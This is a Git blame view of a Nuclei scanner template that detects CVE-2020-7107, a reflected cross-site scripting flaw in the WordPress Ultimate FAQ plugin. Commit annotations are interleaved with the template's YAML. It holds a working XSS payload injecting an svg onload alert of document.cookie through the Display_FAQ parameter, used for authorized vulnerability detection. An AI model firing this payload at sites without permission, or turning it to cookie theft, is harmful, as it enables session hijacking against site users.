daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2020/CVE-2020-7107.yaml

56 lines
2.3 KiB
YAML
Raw Normal View History

templates added
2023-03-18 22:07:09 +00:00
id: CVE-2020-7107
info:
Enhancement: cves/2020/CVE-2020-7107.yaml by md
2023-03-28 18:55:21 +00:00
name: WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting
templates added
2023-03-18 22:07:09 +00:00
author: theamanrawat
severity: medium
description: |
Enhancement: cves/2020/CVE-2020-7107.yaml by md
2023-03-28 18:55:21 +00:00
WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
updated 2020 CVEs
2023-09-06 12:22:36 +00:00
remediation: Fixed in version 1.8.30.
templates added
2023-03-18 22:07:09 +00:00
reference:
- https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
- https://wordpress.org/plugins/ultimate-faqs/
Auto Generated CVE annotations [Mon Mar 20 07:05:15 UTC 2023] :robot:
2023-03-20 07:05:15 +00:00
- https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php
Enhancement: cves/2020/CVE-2020-7107.yaml by md
2023-03-28 18:55:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7107
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://wordpress.org/plugins/ultimate-faqs/#developers
templates added
2023-03-18 22:07:09 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-7107
cwe-id: CWE-79
TemplateMan Update [Mon Nov 20 05:10:39 UTC 2023] :robot:
2023-11-20 05:10:39 +00:00
epss-score: 0.00395
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot:
2023-12-12 11:07:52 +00:00
epss-percentile: 0.70478
updated 2020 CVEs
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*
templates added
2023-03-18 22:07:09 +00:00
metadata:
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
updated 2020 CVEs
2023-09-06 12:22:36 +00:00
max-request: 1
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: etoilewebdesign
product: ultimate_faq
updated 2020 CVEs
2023-09-06 12:22:36 +00:00
framework: wordpress
tags enhancements
2023-12-05 09:50:33 +00:00
tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp,etoilewebdesign
templates added
2023-03-18 22:07:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
templates added
2023-03-18 22:07:09 +00:00
- method: GET
path:
- "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'</script><svg/onload=alert(document.cookie)>"
- "var Display_FAQ_ID ="
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot:
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100a269b1f02d5f0ce47d69178a03b297434f15d7e7c917ab3217af4366981e677e022066a4633d84509cdb21a43e92ba23ab04d150426091155b1615130af5fe5c92de:922c64590222798bb761d5b6d8e72950